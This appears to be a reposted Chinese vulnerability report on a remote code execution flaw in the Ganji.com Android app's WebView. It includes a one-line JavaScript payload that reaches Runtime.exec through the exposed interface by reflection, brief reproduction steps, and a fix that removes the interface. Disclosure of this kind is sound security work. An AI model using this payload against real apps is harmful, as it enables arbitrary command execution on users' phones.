赶集网远程代码执行漏洞(啥都有) - 网站安全 -

赶集网手机客户端,android版

参考: http://HdhCmsTest2cto测试数据/Article/201309/241271.html

我的android系统是4.1.2

function execute(cmdArgs) { return Android.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); }

1,进入[通知]界面,随便点击一个链接,再通过里面某一些功能就可以了。

2,接口已出。

修复方案：

赶集网大公司不应该有这些低级漏洞参见:

http://HdhCmsTest2cto测试数据/Article/201309/241271.html

解决方法: http://HdhCmsTest2cto测试数据/Article/201404/296370.html 测试页面:http://drops.wooyun.org/webview.html 调用remove Java scriptInterface方法,删除接口。

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did15159

更新时间：2022-09-13 阅读：41次